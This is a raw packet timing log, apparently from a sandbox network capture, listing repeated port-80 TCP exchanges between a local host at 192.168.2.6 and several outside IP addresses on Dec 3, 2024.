                                                                                                                            Dec 3, 2024 14:39:20.606991053 CET804994668.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:20.607047081 CET804994668.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:20.607419968 CET4994680192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:20.874108076 CET4994680192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:21.891530037 CET4995380192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:22.011491060 CET804995368.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:22.011655092 CET4995380192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:22.028326988 CET4995380192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:22.148334026 CET804995368.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:23.282828093 CET804995368.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:23.282948971 CET804995368.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:23.283014059 CET4995380192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:23.544188023 CET4995380192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:24.566030025 CET4996080192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:24.686260939 CET804996068.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:24.686363935 CET4996080192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:24.702032089 CET4996080192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:24.822371960 CET804996068.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:24.822388887 CET804996068.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:25.939481020 CET804996068.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:25.939506054 CET804996068.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:25.939580917 CET4996080192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:26.230654955 CET4996080192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:27.235661983 CET4996580192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:27.355830908 CET804996568.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:27.355932951 CET4996580192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:27.373379946 CET4996580192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:27.493412018 CET804996568.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:28.655323982 CET804996568.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:28.655379057 CET804996568.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:28.655512094 CET4996580192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:28.750089884 CET4996580192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:28.870198011 CET804996568.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:34.323486090 CET4998180192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:34.443613052 CET804998131.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:34.443701982 CET4998180192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:34.462908983 CET4998180192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:34.583101988 CET804998131.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:35.822945118 CET804998131.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:35.823004961 CET804998131.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:35.823242903 CET4998180192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:35.966751099 CET4998180192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:36.986054897 CET4998780192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:37.106894970 CET804998731.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:37.107029915 CET4998780192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:37.125868082 CET4998780192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:37.245896101 CET804998731.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:38.497212887 CET804998731.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:38.497395992 CET804998731.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:38.497451067 CET4998780192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:38.638175964 CET4998780192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:39.657614946 CET4999380192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:39.777738094 CET804999331.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:39.778244019 CET4999380192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:39.793891907 CET4999380192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:39.914015055 CET804999331.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:39.914081097 CET804999331.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:41.197916985 CET804999331.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:41.282174110 CET4999380192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:41.310167074 CET4999380192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:41.321182966 CET804999331.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:41.321281910 CET4999380192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:42.330899000 CET5000080192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:42.451117039 CET805000031.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:42.451205015 CET5000080192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:42.464874029 CET5000080192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:42.585017920 CET805000031.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:43.824863911 CET805000031.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:43.825073004 CET805000031.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:43.826176882 CET5000080192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:43.907027960 CET5000080192.168.2.631.31.196.17
                                                                                                                            Dec 3, 2024 14:39:44.027184963 CET805000031.31.196.17192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:49.782217979 CET5002080192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:49.902296066 CET8050020130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:49.902445078 CET5002080192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:49.922200918 CET5002080192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:50.043912888 CET8050020130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:51.245121956 CET8050020130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:51.245332003 CET8050020130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:51.245387077 CET5002080192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:51.437680006 CET5002080192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:52.454601049 CET5002680192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:52.574748039 CET8050026130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:52.574894905 CET5002680192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:52.590816975 CET5002680192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:52.711273909 CET8050026130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:53.834543943 CET8050026130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:53.834644079 CET8050026130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:53.834742069 CET5002680192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:54.106791019 CET5002680192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:55.126351118 CET5003380192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:55.246474028 CET8050033130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:55.246575117 CET5003380192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:55.266241074 CET5003380192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:55.386528015 CET8050033130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:55.386545897 CET8050033130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:56.580390930 CET8050033130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:56.580430984 CET8050033130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:56.580473900 CET5003380192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:56.778842926 CET5003380192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:57.798352003 CET5003480192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:57.918343067 CET8050034130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:57.918625116 CET5003480192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:57.928770065 CET5003480192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:58.048681974 CET8050034130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:59.180696011 CET8050034130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:59.180725098 CET8050034130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:59.181051016 CET5003480192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:59.184751034 CET5003480192.168.2.6130.185.109.77
                                                                                                                            Dec 3, 2024 14:39:59.305105925 CET8050034130.185.109.77192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:07.905554056 CET5003580192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:08.025712013 CET8050035172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:08.029068947 CET5003580192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:08.046125889 CET5003580192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:08.166073084 CET8050035172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:09.457550049 CET8050035172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:09.457820892 CET8050035172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:09.460333109 CET5003580192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:09.559942961 CET5003580192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:10.581168890 CET5003680192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:10.701260090 CET8050036172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:10.701355934 CET5003680192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:10.720089912 CET5003680192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:10.840673923 CET8050036172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:12.133110046 CET8050036172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:12.133140087 CET8050036172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:12.133261919 CET5003680192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:12.231833935 CET5003680192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:13.287621021 CET5003780192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:13.407607079 CET8050037172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:13.410904884 CET5003780192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:13.438276052 CET5003780192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:13.558357954 CET8050037172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:13.558387041 CET8050037172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:14.950706959 CET5003780192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:14.963255882 CET8050037172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:14.963330030 CET5003780192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:14.963700056 CET8050037172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:14.963761091 CET5003780192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:15.070646048 CET8050037172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:15.074337959 CET5003780192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:15.972578049 CET5003880192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:16.092506886 CET8050038172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:16.096689939 CET5003880192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:16.107203960 CET5003880192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:16.227154016 CET8050038172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:17.522635937 CET8050038172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:17.522663116 CET8050038172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:17.522871017 CET5003880192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:17.526374102 CET5003880192.168.2.6172.104.82.74
                                                                                                                            Dec 3, 2024 14:40:17.646368027 CET8050038172.104.82.74192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:23.185621977 CET5003980192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:23.306680918 CET8050039208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:23.306812048 CET5003980192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:23.324469090 CET5003980192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:23.444403887 CET8050039208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:24.558365107 CET8050039208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:24.558464050 CET5003980192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:24.832284927 CET5003980192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:24.952395916 CET8050039208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:25.845562935 CET5004080192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:25.965611935 CET8050040208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:25.965707064 CET5004080192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:25.984782934 CET5004080192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:26.104999065 CET8050040208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:27.217538118 CET8050040208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:27.217633963 CET5004080192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:27.497514963 CET5004080192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:27.600877047 CET8050040208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:27.600929022 CET5004080192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:27.760190964 CET8050040208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:28.516956091 CET5004180192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:28.637526989 CET8050041208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:28.637684107 CET5004180192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:28.655308962 CET5004180192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:28.775510073 CET8050041208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:28.775526047 CET8050041208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:29.803869963 CET8050041208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:29.803947926 CET5004180192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:30.169439077 CET5004180192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:30.289535046 CET8050041208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:31.188757896 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:31.309021950 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:31.309164047 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:31.318845987 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:31.438909054 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.049078941 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.049181938 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.049192905 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.049406052 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.049417019 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.049520969 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.049520969 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.049722910 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.050127983 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.093997955 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.094085932 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.094099998 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.094321012 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.094337940 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.094564915 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.169816017 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.169924021 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.170099020 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.259377003 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.259444952 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.262559891 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.263525009 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.263644934 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.263758898 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.271935940 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.275257111 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.275273085 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.276551962 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.283368111 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.283498049 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.284567118 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.291815042 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.291934967 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.294907093 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.304116964 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.304214001 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.304230928 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.306546926 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.306638956 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.306752920 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.315056086 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.315110922 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.315295935 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.323822021 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.323904037 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.326448917 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.331830025 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.332024097 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.332901001 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.340406895 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.346383095 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.382664919 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.382801056 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.382936954 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.469927073 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.469990969 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.470089912 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.472573996 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.472657919 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.472697973 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.478281975 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.478297949 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.478393078 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.482134104 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.482208014 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.486618042 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.606595993 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:39.012428045 CET5004380192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:39.132500887 CET8050043154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:39.136679888 CET5004380192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:39.150326014 CET5004380192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:39.270284891 CET8050043154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:40.658339024 CET5004380192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:40.778726101 CET8050043154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:40.778975964 CET5004380192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:41.673847914 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:41.793785095 CET8050044154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:41.793870926 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:41.813071012 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:41.933096886 CET8050044154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:43.325961113 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:43.420348883 CET8050044154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:43.420403957 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:43.420455933 CET8050044154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:43.420495987 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:43.445851088 CET8050044154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:43.445899010 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:44.346091986 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:44.466334105 CET8050045154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:44.472353935 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:44.484373093 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:44.604563951 CET8050045154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:44.604603052 CET8050045154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:45.997652054 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:46.073420048 CET8050045154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:46.073476076 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:46.073512077 CET8050045154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:46.073559999 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:46.117906094 CET8050045154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:46.117983103 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:47.018361092 CET5004680192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:47.138374090 CET8050046154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:47.142456055 CET5004680192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:47.154345989 CET5004680192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:47.274384022 CET8050046154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:48.765579939 CET8050046154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:48.765628099 CET8050046154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:48.765759945 CET5004680192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:48.768718958 CET5004680192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:48.888838053 CET8050046154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:54.468717098 CET5004780192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:54.588978052 CET8050047172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:54.589262009 CET5004780192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:54.605845928 CET5004780192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:54.725935936 CET8050047172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:55.729502916 CET8050047172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:55.729569912 CET8050047172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:55.729618073 CET5004780192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:56.108855009 CET5004780192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:57.146363020 CET5004880192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:57.266696930 CET8050048172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:57.268487930 CET5004880192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:57.284466982 CET5004880192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:57.404906034 CET8050048172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:58.365456104 CET8050048172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:58.365497112 CET8050048172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:58.365545034 CET5004880192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:58.796545982 CET5004880192.168.2.6172.104.18.233
